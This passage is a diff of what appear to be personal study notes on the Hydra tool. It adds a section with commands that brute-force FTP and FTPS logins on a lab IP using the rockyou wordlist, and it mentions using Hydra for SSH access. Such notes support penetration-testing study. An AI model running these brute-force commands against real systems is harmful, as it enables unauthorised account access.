ericbulloch/kwmd/tools/hydra.md

 `hydra -l bob -P /usr/share/wordlists/rockyou.txt ftp://10.10.1.1`

+### ftps

+Using ftps is better than ftp for security.

+The syntax is the following when not including options:

+`hydra -l bob -P /usr/share/wordlists/rockyou.txt 10.10.1.1 ftps`

+or

+`hydra -l bob -P /usr/share/wordlists/rockyou.txt ftps://10.10.1.1`

 ### ssh

 If a system is vulnerable to an ssh brute force (meaning if I type `ssh target_machine` and it asks for a password) and I have either a username or password, hydra can help you gain access.